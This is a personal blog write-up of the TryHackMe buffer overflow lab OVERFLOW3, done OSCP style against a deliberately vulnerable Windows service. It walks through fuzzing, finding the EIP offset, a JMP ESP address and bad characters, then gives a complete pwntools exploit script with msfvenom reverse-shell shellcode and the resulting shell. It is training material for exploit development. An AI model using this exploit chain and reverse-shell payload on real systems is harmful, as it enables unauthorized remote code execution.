u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Tryhackme Buffer Overflow 3 OSCP style

Third post about the bufferoverflow series on tryhackme. Writeup Buffer Overflow 3 OSCP style.

Note

Because this post is about practice and repeat I will be (more) direct to the action and I will use a simple post estructure. These are just personal notes and are resumed.

The first bufferoverflow can be found here:

https://u915.net/posts/2021/06/tryhackme-buffer-overflow-1-oscp-style/

Environment

I used the windows 7 VM 32bits with inmunity debugger inside the tryhackme room.

Windows Firewall and Defender are disabled.

Connection

Remote connection to the machine:

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.πŸ˜„ /workarea

Basic test

nc 10.10.πŸ˜„ 1337
Welcome to OSCP Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
OVERFLOW1 [value]
OVERFLOW2 [value]
OVERFLOW3 [value]
OVERFLOW4 [value]
OVERFLOW5 [value]
OVERFLOW6 [value]
OVERFLOW7 [value]
OVERFLOW8 [value]
OVERFLOW9 [value]
OVERFLOW10 [value]
EXIT

Fuzz

Fuzzing the command OVERFLOW3 [value]

#!/bin/python3

from pwn import *

HOST = "10.10.πŸ˜„"
PORT = "1337"
LIMIT = 60
CHARS_FUZZ = 50

r = remote(HOST,PORT)
print(r.recvline(timeout=1))

for x in range (1,LIMIT):
	print("[+] SENDING "+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
	r.sendline("OVERFLOW3 "+"A"*CHARS_FUZZ*x)
	if (r.recvline(timeout=1))==b'':
		print("[!] KO")
		r.close()
		break

Trace

[+] Opening connection to 10.10.:smile; on port 1337: Done
b'Welcome to OSCP Vulnerable Server! Enter HELP for help.\n'
[+] SENDING 50 CHARS, COUNTER:1
[+] SENDING 100 CHARS, COUNTER:2
[+] SENDING 150 CHARS, COUNTER:3
[+] SENDING 200 CHARS, COUNTER:4
[+] SENDING 250 CHARS, COUNTER:5
[+] SENDING 300 CHARS, COUNTER:6
[+] SENDING 350 CHARS, COUNTER:7
[+] SENDING 400 CHARS, COUNTER:8
[+] SENDING 450 CHARS, COUNTER:9
[+] SENDING 500 CHARS, COUNTER:10
[+] SENDING 550 CHARS, COUNTER:11
[+] SENDING 600 CHARS, COUNTER:12
[+] SENDING 650 CHARS, COUNTER:13
[+] SENDING 700 CHARS, COUNTER:14
[+] SENDING 750 CHARS, COUNTER:15
[+] SENDING 800 CHARS, COUNTER:16
[+] SENDING 850 CHARS, COUNTER:17
[+] SENDING 900 CHARS, COUNTER:18
[+] SENDING 950 CHARS, COUNTER:19
[+] SENDING 1000 CHARS, COUNTER:20
[+] SENDING 1050 CHARS, COUNTER:21
[+] SENDING 1100 CHARS, COUNTER:22
[+] SENDING 1150 CHARS, COUNTER:23
[+] SENDING 1200 CHARS, COUNTER:24
[+] SENDING 1250 CHARS, COUNTER:25
[+] SENDING 1300 CHARS, COUNTER:26
[!] KO
[*] Closed connection to 10.10.:smile; port 1337

The server crashes between the range 1300 and 1250 chars

Finding the exact chars needed

To check how many characters are required to crash the server I used msfpattern with a 2000 characters sample:

msf-pattern_create -l 1300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B

Using nc to send the 2000 chars pattern generated

nc 10.10.:smile; 1337 
Welcome to OSCP Vulnerable Server! Enter HELP for help.
OVERFLOW3 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B

The EIP value is 35714234

msf-pattern_offset -l 1300 -q 35714234
[*] Exact match at offset 1274

So the exact offset is 1274

Finding JMP ESP

/usr/bin/msf-nasm_shell 
nasm > jmp esp
00000000  FFE4              jmp esp

Using mona inside Inmunity debugger to find a memory address without protection.

!mona modules
!mona find -s "\xff\xe4"

Selected adress:

0x77041A2B

To little endian:

77041A2B -> esp = “\x2b\x1a\x04\x77”

Finding Bad chars

Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Setup bytearray

!mona bytearray -cpb \x00

Generic char list, without \x00:

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Final bad chars script:

#!/bin/python3

from pwn import *

HOST = "10.10.πŸ˜„"
PORT = "1337"
offset = 634
fuzz = "A"*offset

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3d\x3e\x3f\x40\x41\x42"
"\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62"
"\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82"
"\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3"
"\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4"
"\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

r = remote(HOST,PORT)
print(r.recvline(timeout=1))

print("[+] SENDING "+str(offset)+" CHARS + BADCHARS")
r.sendline("OVERFLOW3 "+str(fuzz)+"BBBB"+badchars)
if (r.recvline(timeout=1))==b'':
	print("[!] KO")
	r.close()

Final bad chars are:

!mona bytearray -cpb \x00\x11\x40\x5f\xb8\xee
!mona compare -a 01A1FA30 -f C:\Users\admin\Desktop\oscp\bytearray.bin

Compare worked. Note: Do not forget to change the esp memory address in each iteration (parameter -a).

Payload

Payload generated with msfvenom

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.9.πŸ˜„ LPORT=4433 -f c -v shellcode -b '\x00\x11\x40\x5f\xb8\xee' EXITFUNC=thread                                                                         130 β¨―
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with Encoding failed due to a bad character (index=20, char=0xee)
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=275, char=0x11)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with Encoding failed due to a bad character (index=4, char=0xee)
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 353 (iteration=0)
x86/jmp_call_additive chosen with final size 353
Payload size: 353 bytes
Final size of c file: 1514 bytes
unsigned char shellcode[] = 
"\xfc\xbb\xb3\xc9\xf0\xae\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x4f\x21\x72\xae\xaf"
"\xb2\x13\x26\x4a\x83\x13\x5c\x1f\xb4\xa3\x16\x4d\x39\x4f\x7a"
"\x65\xca\x3d\x53\x8a\x7b\x8b\x85\xa5\x7c\xa0\xf6\xa4\xfe\xbb"
"\x2a\x06\x3e\x74\x3f\x47\x07\x69\xb2\x15\xd0\xe5\x61\x89\x55"
"\xb3\xb9\x22\x25\x55\xba\xd7\xfe\x54\xeb\x46\x74\x0f\x2b\x69"
"\x59\x3b\x62\x71\xbe\x06\x3c\x0a\x74\xfc\xbf\xda\x44\xfd\x6c"
"\x23\x69\x0c\x6c\x64\x4e\xef\x1b\x9c\xac\x92\x1b\x5b\xce\x48"
"\xa9\x7f\x68\x1a\x09\x5b\x88\xcf\xcc\x28\x86\xa4\x9b\x76\x8b"
"\x3b\x4f\x0d\xb7\xb0\x6e\xc1\x31\x82\x54\xc5\x1a\x50\xf4\x5c"
"\xc7\x37\x09\xbe\xa8\xe8\xaf\xb5\x45\xfc\xdd\x94\x01\x31\xec"
"\x26\xd2\x5d\x67\x55\xe0\xc2\xd3\xf1\x48\x8a\xfd\x06\xae\xa1"
"\xba\x98\x51\x4a\xbb\xb1\x95\x1e\xeb\xa9\x3c\x1f\x60\x29\xc0"
"\xca\x27\x79\x6e\xa5\x87\x29\xce\x15\x60\x23\xc1\x4a\x90\x4c"
"\x0b\xe3\x3b\xb7\xdc\x06\xb5\xb3\xbc\x7f\xc7\xbb\xad\x2e\x4e"
"\x5d\xa7\xc0\x06\xf6\x50\x78\x03\x8c\xc1\x85\x99\xe9\xc2\x0e"
"\x2e\x0e\x8c\xe6\x5b\x1c\x79\x07\x16\x7e\x2c\x18\x8c\x16\xb2"
"\x8b\x4b\xe6\xbd\xb7\xc3\xb1\xea\x06\x1a\x57\x07\x30\xb4\x45"
"\xda\xa4\xff\xcd\x01\x15\x01\xcc\xc4\x21\x25\xde\x10\xa9\x61"
"\x8a\xcc\xfc\x3f\x64\xab\x56\x8e\xde\x65\x04\x58\xb6\xf0\x66"
"\x5b\xc0\xfc\xa2\x2d\x2c\x4c\x1b\x68\x53\x61\xcb\x7c\x2c\x9f"
"\x6b\x82\xe7\x1b\x8b\x61\x2d\x56\x24\x3c\xa4\xdb\x29\xbf\x13"
"\x1f\x54\x3c\x91\xe0\xa3\x5c\xd0\xe5\xe8\xda\x09\x94\x61\x8f"
"\x2d\x0b\x81\x9a\x2d\xab\x7d\x25";

Final script and reverse shell

The final script looks like this:

#!/bin/python3

from pwn import *

HOST = "10.10.:smile;"
PORT = "1337"
offset = 1274
esp = "\x2b\x1a\x04\x77"

nop = "\x90"*20

shellcode = ("\xfc\xbb\xb3\xc9\xf0\xae\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x4f\x21\x72\xae\xaf"
"\xb2\x13\x26\x4a\x83\x13\x5c\x1f\xb4\xa3\x16\x4d\x39\x4f\x7a"
"\x65\xca\x3d\x53\x8a\x7b\x8b\x85\xa5\x7c\xa0\xf6\xa4\xfe\xbb"
"\x2a\x06\x3e\x74\x3f\x47\x07\x69\xb2\x15\xd0\xe5\x61\x89\x55"
"\xb3\xb9\x22\x25\x55\xba\xd7\xfe\x54\xeb\x46\x74\x0f\x2b\x69"
"\x59\x3b\x62\x71\xbe\x06\x3c\x0a\x74\xfc\xbf\xda\x44\xfd\x6c"
"\x23\x69\x0c\x6c\x64\x4e\xef\x1b\x9c\xac\x92\x1b\x5b\xce\x48"
"\xa9\x7f\x68\x1a\x09\x5b\x88\xcf\xcc\x28\x86\xa4\x9b\x76\x8b"
"\x3b\x4f\x0d\xb7\xb0\x6e\xc1\x31\x82\x54\xc5\x1a\x50\xf4\x5c"
"\xc7\x37\x09\xbe\xa8\xe8\xaf\xb5\x45\xfc\xdd\x94\x01\x31\xec"
"\x26\xd2\x5d\x67\x55\xe0\xc2\xd3\xf1\x48\x8a\xfd\x06\xae\xa1"
"\xba\x98\x51\x4a\xbb\xb1\x95\x1e\xeb\xa9\x3c\x1f\x60\x29\xc0"
"\xca\x27\x79\x6e\xa5\x87\x29\xce\x15\x60\x23\xc1\x4a\x90\x4c"
"\x0b\xe3\x3b\xb7\xdc\x06\xb5\xb3\xbc\x7f\xc7\xbb\xad\x2e\x4e"
"\x5d\xa7\xc0\x06\xf6\x50\x78\x03\x8c\xc1\x85\x99\xe9\xc2\x0e"
"\x2e\x0e\x8c\xe6\x5b\x1c\x79\x07\x16\x7e\x2c\x18\x8c\x16\xb2"
"\x8b\x4b\xe6\xbd\xb7\xc3\xb1\xea\x06\x1a\x57\x07\x30\xb4\x45"
"\xda\xa4\xff\xcd\x01\x15\x01\xcc\xc4\x21\x25\xde\x10\xa9\x61"
"\x8a\xcc\xfc\x3f\x64\xab\x56\x8e\xde\x65\x04\x58\xb6\xf0\x66"
"\x5b\xc0\xfc\xa2\x2d\x2c\x4c\x1b\x68\x53\x61\xcb\x7c\x2c\x9f"
"\x6b\x82\xe7\x1b\x8b\x61\x2d\x56\x24\x3c\xa4\xdb\x29\xbf\x13"
"\x1f\x54\x3c\x91\xe0\xa3\x5c\xd0\xe5\xe8\xda\x09\x94\x61\x8f"
"\x2d\x0b\x81\x9a\x2d\xab\x7d\x25")


r = remote(HOST,PORT)
print(r.recvline(timeout=1))

print("[+] SENDING PAYLOAD")
payload = "A"*offset+esp+nop+str(shellcode)
r.sendline("OVERFLOW3 "+payload)

if (r.recvline(timeout=1))==b'':
	print("[!] KO")
	r.close()
	

There are 20 Nop(\x90) operations to prevent race write operations.

Finally setting up a nc listener and triggering the buffer overflow:

nc -lvp 4433
listening on [any] 4433 ...
10.10.:smile;: inverse host lookup failed: Unknown host
connect to [10.9.πŸ˜„] from (UNKNOWN) [10.10.:smile;] 49260
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin




Thanks for reading!